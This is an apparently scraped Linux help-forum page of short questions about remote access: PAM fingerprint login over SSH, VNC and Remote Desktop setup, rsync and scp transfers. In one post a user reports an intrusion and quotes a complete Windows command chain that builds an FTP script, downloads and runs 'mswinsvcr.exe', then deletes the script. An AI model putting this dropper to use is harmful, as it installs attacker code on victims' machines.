Security :: Use Different PAM Modules Depending On Local/remote Access?
Mar 16, 2010
I'm using a fingerprint reader on my laptop, works pretty well:
Code:
$sudo echo hi
Please swipe your finger:
[swipe finger here of course]
[Code]....
Like I said, it works nicely... until I try to SSH in and sudo something remotely, when it will ask me kindly to swipe my finger over the reader that's attached to the laptop which is on my desk at home thirty kilometres away. Naturally there's no method built into pam_fprint to abort via a keypress.
So, is there any way to tell PAM to only use certain modules if I'm in a locally logged in session?
View 2 Replies
ADVERTISEMENT
Feb 19, 2010
Running Ubuntu 9.10. In the Remote Desktop config dialog I get: "Your desktop is only reachable over the local network. Others can access your computer using the address 127.0.0.1 or tabatha.local." I understand this means only the loopback ip address is available. All my other machines show their true local ip address (e.g., 192.168.1.104) in this dialog. Thus I cannot log on to this desktop from other machines.
When I try to do a remote logon from another Ubuntu 9.10 box (or from an XP box using a VNC viewer), I get: "Connection to 192.168.1.102 has been closed." What steps are needed to make this machine show its actual ip address? All file sharing between the various machines is working properly and all windows shares back and forth between XP and 'nix, and among the the vaious XP boxes and linux boxes are available as designed.
View 1 Replies
View Related
Jan 29, 2010
how i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux
View 9 Replies
View Related
Aug 19, 2011
I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.
/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.
View 1 Replies
View Related
Aug 8, 2010
Is it possible to remotely access, inject, manipulate files and/or folders in the Windows NTFS partition when logged into Ubuntu?
I'm either logged into Windows or Ubuntu but NOT both -- ever. Therefore, while logged into Ubuntu, would it be possible for someone to crack into Windows via Ubuntu using Wi-Fi or modem?
View 5 Replies
View Related
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies
View Related
Jan 12, 2010
What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time.I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.
Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.
View 3 Replies
View Related
Dec 30, 2010
host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Feb 27, 2011
I want to remotely install OpenSUSE on one of my servers. I followed the instructions given at SDB:Remote installation - openSUSE, but it didn't work. (My server reverted back to the already installed system.) I think this has to do with a special kernel module (megaraid_sas) that is necessary for the raid controller. Without this module, the kernel cannot find any disk. Of course, the module is not included in the initrd provided by OpenSUSE. I know how to add files to the initrd, but I have no idea where I have to put the required kernel module and which config file inside the initrd must be modified to make the kernel load the module.
View 1 Replies
View Related
Mar 22, 2011
Can anyone tell me some current and future threats to the authentication methods used in Linux system. Modules like PAM(Pluggable authentication method), SASL, Kerberos, Shared secrets, shared passwords etc.
View 2 Replies
View Related
Jul 6, 2010
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
View 9 Replies
View Related
May 31, 2011
I am having difficulty sending files from a remote machine to local one using
Code:
scp
. It is working the other way however. local > remote. I am using the verbose options
[code]....
View 3 Replies
View Related
Sep 22, 2010
I'm trying to rsync a folder(and all subfolders) down to a local directory, upon completion I'd like the remote folder to be deleted.
What I've come up with is
Code:
rsync -rvtW --remove-sent-files -e ssh user@example.com:/remote/folder /local/folder
What this is doing is simply wiping the remote files within folders(not the folders themselves) and not actually syncing anything down to my local folder(as in no files at all on my /local/folder)
View 1 Replies
View Related
Nov 14, 2010
I have the need to SSH into a Slackware 12 box to provide remote support. I got this, but it doesn't provide for a real 2-way communication.
while : ;
do read -p "Enter text to Local: " TXT ;
DISPLAY=:0 Kdialog --inputbox "$TXT" ;
done
So this loops and all, but it doesn't have a history and I have to wait for a return from the Local operator. If the operator has changed focus I can be waiting all day for a response and I would have to start another session to post a second comment.
What is nice is that it's small and I can create the .sh when I remote in.
-----Update since I started
I now have two scripts to take over from the first one. I have to have 4 SSH running to get this to work.
1 SSH to move(archive) and create a chat.txt; it also fires off a .sh that fires off a console that tails a chat.txt so the operator can see the chat history
2nd SSH to fire off a .sh that loops a Local kdialog input box that appends the chat.txt 3rd SSH to tail -f the chat.txt file on the remote so I can see the chat history 4th SSH to loop a read -p on the SSH so I can append the chat.txt
View 5 Replies
View Related
Mar 18, 2016
I am trying to stream audio from one machine to several others via pulseaudio.
Following a bit of digging, I configured the "sender" with:
load-module module-null-sink sink_name=rtp
load-module module-rtp-send source=rtp.monitor rate=48000 channels=2 format=s16be
..and the "listeners" with: load-module module-rtp-recv
Then, playing on the sender, and using PulseAudio Volume Control /Playback to set "Null Output", my listeners all start working as expected. The outstanding problem is that the sender is silent - nothing from its speakers. Perhaps not surprising after the "Null" setting above.
Is it possible to stream like this and also listen on the sender at the same time -
View 6 Replies
View Related
Sep 27, 2010
I'm using Windows XP. I'm connecting to a UNIX box using putty SHH(ksh). Now I want to copy a text file present in remote host to my local system.
View 5 Replies
View Related
Jul 13, 2010
I have Ubuntu 10.04 (fresh install) and it is my work computer/Server and i'd like access to this PC from my home. But with Remote Desktop it only says i can do local.
I've look around and opened up port 5900 in my router. Set this IP to to static and forwarded the port to this computer.
I've read that unchecking the "configure network automatically to accept connections" as it seems to cause an issue in ports i've read. Still nothing.
Here is a screen cap of my settings
Uploaded with ImageShack.us
How can i allow access from my Windows Based PC to this computer over the internet?
View 1 Replies
View Related
May 12, 2011
I'm looking to convert my HTPC into a remote android dev server for my girlfriend and myself, however I want to make sure that it is possible to do what I am looking to do.Is it possible to map local devices to the VNC server (such as an android phone) so that we can work on development over VNC with phones we have on our client computers? I know its a trivial matter to map local drives over VNC, but what about non-HD devices, can I still maintain full functionality as if the device itself was plugged directly into the server?'ll be installing ubuntu again this weekend, never got around to it after my last HD failure.
View 1 Replies
View Related
Mar 29, 2011
I'm doing some commands on a remote server (using ssh to log on to the remote server, did a ssh key swap), how do i redirect the output of a command back to the local server ?the person who helps me out is my HERO i'm really stuck on this and it would bring me a lot further if i get this to work
View 14 Replies
View Related
Oct 15, 2010
As many developers probably do, I have a Windows based machine on which I run XAMPP locally to test my code and a Linux machine with Fedora as my remote server.As I sometimes use .htaccess as a way to authenticate some parts of the website, I end up having two .htaccess files: one with the local path (something line D:My_Webs) and one with my remote path (something like /var/www/html/) to the password file.I have searched high and low, but I cannot seem to find any trick so that I only have to maintain one version of the .htaccess file which can work on both Linux and on Windows machines.
View 6 Replies
View Related
Sep 1, 2011
my local box is centos 5.5 running gnome.
I have a eucalyptus instance (vm) running an older version of centos (5.3?). As a vm it has no graphical display. I'd like to run a graphical app there so that it displays back on my local machine.
Used xhost locally and it shows the remote IP (eucalyptus instance) as enabled. On the remote side (eucalyptus instance) I set DISPLAY with:
export DISPLAY xx.xx.xx.xx:0.0
where xx.xx.xx.xx is my local ip address. Oh, I did install X in the vm instance (yum groupinstall "X Window System"). X is installed but not running there (does the point of origin of the x app need to have X running as well - and what does this mean in a vm which is a non-graphicla environment?).
Anyway, I try to run (from remote to local) xclock and get the typical
Error: Can't open display.
View 3 Replies
View Related
Mar 24, 2010
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
View 9 Replies
View Related
Jul 14, 2010
I have two linux box that i would like to keep in sync. I see option -avz syncs the remote with local but new local files are not pushed.
View 2 Replies
View Related
Aug 12, 2010
How do you transfer a file from a local Mac to a remote Linux machine
View 5 Replies
View Related
Jun 28, 2011
I have a Ubuntu server hosted on Amazon EC2. I need to create an automated backup scheme so I created another Ubuntu instance on my local network which is hosted in a virtual environment. I managed to transfer the necessary files between 2 machines on the same network using the rsync command:
rsync -azvv -e ssh /home/path/folder1/ remoteuser@remotehost.remotedomain:/home/path/folder2
How can I do the same thing but transferring files from my Amazon server to my local server? Is there a way I can achieve this with port forwarding, or by VPN, or anything else? It doesn't have to be rsync. If you know about a better method, kindly let me know.
View 2 Replies
View Related
Aug 27, 2010
I have a remote drive mounted on my system(ubuntu 10.04 x64), and i have the contents of that drive backed up to dropbox. the problem is, if i unmount the drive, the files disappear from dropbox. is there a way to mirror the contents of the network drive to a localfolder(preferably in such a way that all changes and file deletions are changed on the local folder instantly, but unmounting doesn't delete it all)? It looks like rsync would work, but im not sure how to make it work.
View 2 Replies
View Related
Jul 1, 2011
I want to have a script that pull db from remote server to my local. Beside that the filename should contain current date the time the db was dumped.
Ex: getdb databaseName
Then the filename should be like this:
So basically I have an archive of DB. Similar to this I need also a script that pull directory from remote to my local.
Ex: getdir htdocs
Then the filename should be like this:
View 1 Replies
View Related
Apr 15, 2011
I know I can ssh login without password from a local to a remote. My question is how I can ssh without password from the remote to another remote. Say, I have three machines: A, B, C where A is the local machine. I use the same private/public key pair for all the login. What I can do are:
1. ssh from A to B.
2. ssh from A to C.
3. If I am sitting in the computer B (or B is local), then I can ssh from B to C.
What I am not able to do is:
After I ssh from A to B, I cannot ssh from the B to C. When I try to ssh from B to C, it asks me a passphrase.
View 1 Replies
View Related
Jan 28, 2010
Is is possible to move a process from one shell to another (local to remote)
e.g.
if
my_code.sh &
#jobs
[1]- Running my_code.sh &
was started on one remote shell is it possible to move it to the foreground on another shell as root or another user?
View 5 Replies
View Related
